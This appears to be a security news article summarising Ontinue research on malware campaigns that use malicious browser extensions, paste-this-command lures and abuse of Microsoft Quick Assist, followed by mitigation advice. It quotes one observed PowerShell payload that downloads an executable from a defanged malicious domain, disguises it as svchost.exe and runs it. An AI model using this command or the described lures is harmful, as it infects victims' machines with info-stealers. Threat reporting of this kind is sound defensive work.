A new wave of cyberattacks leveraging browser extensions and trusted system tools has emerged as a critical threat to enterprise security.
Over the past six months, threat actors have refined techniques to deliver malware through deceptive browser add-ons and abuse built-in Microsoft utilities like Quick Assist.
These attacks bypass traditional security controls by exploiting user behavior and legitimate software functionalities, creating persistent backdoors even after system remediation efforts.
.png
)
The malware campaign employs malicious browser extensions, often distributed through compromised Chrome Web Store listings or malvertising redirects.
Once installed, these extensions embed themselves within user profiles, enabling threat actors to steal credentials, session cookies, and sensitive data.
Crucially, the extensions survive system reimaging, as victims frequently reintroduce infected browser profiles during device recovery.
This persistence mechanism ensures repeated reinfection, complicating mitigation efforts.
Ontinue analysts identified that attackers pair these extensions with social engineering tactics to execute malicious PowerShell commands.
In one prevalent malvertising scheme, users are redirected to fake verification pages instructing them to press Windows + R and paste obfuscated PowerShell code.
.webp)
A typical payload observed in the wild includes:-
Start-BitsTransfer -Source "hxxps://malicious[.]domain/update.exe" -Destination "$env:Temp\svchost.exe"; Start-Process "$env:Temp\svchost.exe"This script downloads a secondary payload masquerading as a legitimate Windows process, often deploying info-stealers like Lumma or ransomware loaders.
Exploiting Quick Assist for Remote Access
A notable subtopic in these attacks is the abuse of Microsoft’s Quick Assist tool to establish covert remote access.
Quick Assist, a preinstalled Windows application designed for remote troubleshooting, requires victims to share a six-digit verification code with attackers posing as IT support personnel.
.webp)
Once granted access, threat actors disable security tools, manipulate registry keys for persistence, and deploy malware.
Ontinue researchers noted that adversaries combine this tactic with “spam bomb” campaigns, where victims receive hundreds of phishing emails to obscure legitimate communications.
Overwhelmed users are then coerced into contacting fake support hotlines, where attackers guide them through enabling Quick Assist sessions.
Post-compromise, adversaries frequently install browser extensions to maintain access or exfiltrate data.
The misuse of Quick Assist highlights a broader trend of weaponizing trusted applications. Unlike third-party tools, Quick Assist bypasses endpoint detection rules due to its Microsoft-signed origin.
This grants attackers an operational advantage, as security teams often prioritize monitoring less common remote access software.
Mitigation strategies include disabling Quick Assist via Group Policy in enterprise environments and auditing browser extensions for unauthorized or suspicious permissions.
Ontinue recommends segmenting network zones to limit lateral movement and enforcing strict PowerShell execution policies.
As attackers evolve their abuse of legitimate tools, continuous monitoring and user education remain vital to countering these threats.
Investigate Real-World Malicious Links & Phishing Attacks With Threat Intelligence Lookup - Try for Free
